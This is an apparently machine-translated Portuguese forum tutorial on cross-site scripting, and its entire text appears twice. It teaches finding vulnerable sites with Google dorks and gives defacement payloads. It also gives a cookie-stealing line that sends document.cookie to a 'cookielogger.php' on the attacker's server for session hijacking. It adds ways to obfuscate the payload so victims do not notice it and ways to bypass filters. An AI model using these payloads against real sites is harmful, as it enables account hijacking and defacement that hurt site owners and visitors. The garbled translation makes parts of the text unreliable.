O que é Cross Site Scripting (XSS)?
Cross Site Scripting permite que você insira um código malicioso em uma aplicação web. (quase com um código javascript, mas também é possível inserir outros códigos como PHP ou HTML.
É uma vulnerabilidade que está em quase todos os site que você pode encontrar na [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Além disso, vou falar sobre 2 maneiras diferentes de usar XSS ...
1. O atacante vai incluir um código em um URL. O XSS não vai ficar na página.
2. O atacante será capaz de inserir um código e ele vai ficar no site. Normalmente, o atacante irá escolher um site com alguns campos "input", como shoutboxes, blogs e guestbooks.
Encontrando vulnerabilidades XSS
1. [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] Visite
2. Use "dorks Google", como search.php? Q =
3. Encontrado o "direito" site para injetá-lo.
Noções básicas de XSS
Um comum usado Cross Site Scripting injeção é o código JavaScript a seguir:
Citação:
<script>alert("something")</script>
Se você executá-lo, ele irá aparecer uma caixa de mensagem que vai dizer "alguma coisa".
Soooo, se você encontrar um site vuln você poderia testar se é a vuln XSS.
Basta olhar:
Citação:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Isso foi um exemplo para um XSS com javascript.
Mas como eu disse antes, o JavaScript não é o único tipo de código que você pode usar para executar um XSS.
Aqui está um exemplo de uma injeção HTML:
Citação:
<br><br><b><u>something</u></b>
Será algo como:
Citação:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Você deverá ver um texto em negrito na página, se a página é vulnerável a XSS.
Defacment com XSS
Para apagar um site com Cross Site Scripting (XSS), você pode usar os seguintes códigos:
Citação:
<IMG SRC="http://mywebsite.com/defacmentpic.jpg">
= Irá incluir uma imagem
Citação:
<EMBED SRC="http://mywebsite.com/deface.swf"
= Incluirá um vídeo em Flash
Citação:
<script>window.open( "http://www.XXXXXXX.net/" )</script>
= Redireccionado para outro site, neste caso "XXXXXXXXXXXX.net"
Roubar cookies usando XSS
O método mais utilizado de XSS é o roubo de cookies.
Primeiro obtenha uma cookielogger.php (irá anexá-lo!)
Ok, agora temos a cookielogger.php. Enviá-lo para seu servidor e também criar um log.txt onde seus logs serão armazenados.
Certifique-se que ele funciona!
Procura um site vuln e insira o seguinte código:
(substitui-lo com suas informações)
Citação:
document.location = "http://myserver.com/cookielogger.php?c="+document.cookie
Agora, se o usuário visite o site da sua cookies serão roubados e enviados para o seu CookieLogger.
Analisar o madeireiro para seus cookies e sequestrar a sua sessão.
Mas o que é se o site não possui uma função tal loja?
Veja ...
Citação:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] = "http://myserver.com/cookielogger.php?c="+document.cookie
Você será redirecionado ao site original para o servidor.
(você deve cripta "a seqüência de URL, porque a sua vítima poderia observar o código malicioso incluído para o original URL)
Mas como "crypt" esse código para se tornar "normal", de modo que sua vítima não percebe o redirecionamento para o servidor?
Fácil ... tudo que você precisa é de uma String para ASCII Converter e as características da função ()
(Http://www.easycalculation.com/ascii-hex.php)
Ok, agora escolher o seu código JavaScript e convertê-lo em ASCII.
Citação:
<script>alert("Example")</script>
é igual
Citação:
60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62
Agora, o navegador só poderia ler o código, se há uma vírgula entre os dedos. Como esta:
Citação:
60,115,99,114,105, [...]
Finished! Você crypted seu código malicioso a um "código" malicioso escondido: D!
Ignorando Filtros
Mas o que poderíamos fazer, se um webadmin bloqueou alguns personagens?
Hm, temos de encontrar outro método ... basta escrever o código de uma maneira diferente.
Citação:
<script>alert("Example")</script>
seria
Citação:
')alert("Example");
%20 -> ((16^0)*0 + (16^1)*2) = 32 [Espaço em branco]
%5A -> ((16^0)*10 + (16^1)*5) = 10 + 16*5 = 90 [Z maiusculo]
créditos : hm
Cross Site Scripting permite que você insira um código malicioso em uma aplicação web. (quase com um código javascript, mas também é possível inserir outros códigos como PHP ou HTML.
É uma vulnerabilidade que está em quase todos os site que você pode encontrar na [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Além disso, vou falar sobre 2 maneiras diferentes de usar XSS ...
1. O atacante vai incluir um código em um URL. O XSS não vai ficar na página.
2. O atacante será capaz de inserir um código e ele vai ficar no site. Normalmente, o atacante irá escolher um site com alguns campos "input", como shoutboxes, blogs e guestbooks.
Encontrando vulnerabilidades XSS
1. [Tens de ter uma conta e sessão iniciada para poderes visualizar este link] Visite
2. Use "dorks Google", como search.php? Q =
3. Encontrado o "direito" site para injetá-lo.
Noções básicas de XSS
Um comum usado Cross Site Scripting injeção é o código JavaScript a seguir:
Citação:
<script>alert("something")</script>
Se você executá-lo, ele irá aparecer uma caixa de mensagem que vai dizer "alguma coisa".
Soooo, se você encontrar um site vuln você poderia testar se é a vuln XSS.
Basta olhar:
Citação:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Isso foi um exemplo para um XSS com javascript.
Mas como eu disse antes, o JavaScript não é o único tipo de código que você pode usar para executar um XSS.
Aqui está um exemplo de uma injeção HTML:
Citação:
<br><br><b><u>something</u></b>
Será algo como:
Citação:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
Você deverá ver um texto em negrito na página, se a página é vulnerável a XSS.
Defacment com XSS
Para apagar um site com Cross Site Scripting (XSS), você pode usar os seguintes códigos:
Citação:
<IMG SRC="http://mywebsite.com/defacmentpic.jpg">
= Irá incluir uma imagem
Citação:
<EMBED SRC="http://mywebsite.com/deface.swf"
= Incluirá um vídeo em Flash
Citação:
<script>window.open( "http://www.XXXXXXX.net/" )</script>
= Redireccionado para outro site, neste caso "XXXXXXXXXXXX.net"
Roubar cookies usando XSS
O método mais utilizado de XSS é o roubo de cookies.
Primeiro obtenha uma cookielogger.php (irá anexá-lo!)
Ok, agora temos a cookielogger.php. Enviá-lo para seu servidor e também criar um log.txt onde seus logs serão armazenados.
Certifique-se que ele funciona!
Procura um site vuln e insira o seguinte código:
(substitui-lo com suas informações)
Citação:
document.location = "http://myserver.com/cookielogger.php?c="+document.cookie
Agora, se o usuário visite o site da sua cookies serão roubados e enviados para o seu CookieLogger.
Analisar o madeireiro para seus cookies e sequestrar a sua sessão.
Mas o que é se o site não possui uma função tal loja?
Veja ...
Citação:
[Tens de ter uma conta e sessão iniciada para poderes visualizar este link] = "http://myserver.com/cookielogger.php?c="+document.cookie
Você será redirecionado ao site original para o servidor.
(você deve cripta "a seqüência de URL, porque a sua vítima poderia observar o código malicioso incluído para o original URL)
Mas como "crypt" esse código para se tornar "normal", de modo que sua vítima não percebe o redirecionamento para o servidor?
Fácil ... tudo que você precisa é de uma String para ASCII Converter e as características da função ()
(Http://www.easycalculation.com/ascii-hex.php)
Ok, agora escolher o seu código JavaScript e convertê-lo em ASCII.
Citação:
<script>alert("Example")</script>
é igual
Citação:
60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62
Agora, o navegador só poderia ler o código, se há uma vírgula entre os dedos. Como esta:
Citação:
60,115,99,114,105, [...]
Finished! Você crypted seu código malicioso a um "código" malicioso escondido: D!
Ignorando Filtros
Mas o que poderíamos fazer, se um webadmin bloqueou alguns personagens?
Hm, temos de encontrar outro método ... basta escrever o código de uma maneira diferente.
Citação:
<script>alert("Example")</script>
seria
Citação:
')alert("Example");
%20 -> ((16^0)*0 + (16^1)*2) = 32 [Espaço em branco]
%5A -> ((16^0)*10 + (16^1)*5) = 10 + 16*5 = 90 [Z maiusculo]
créditos : hm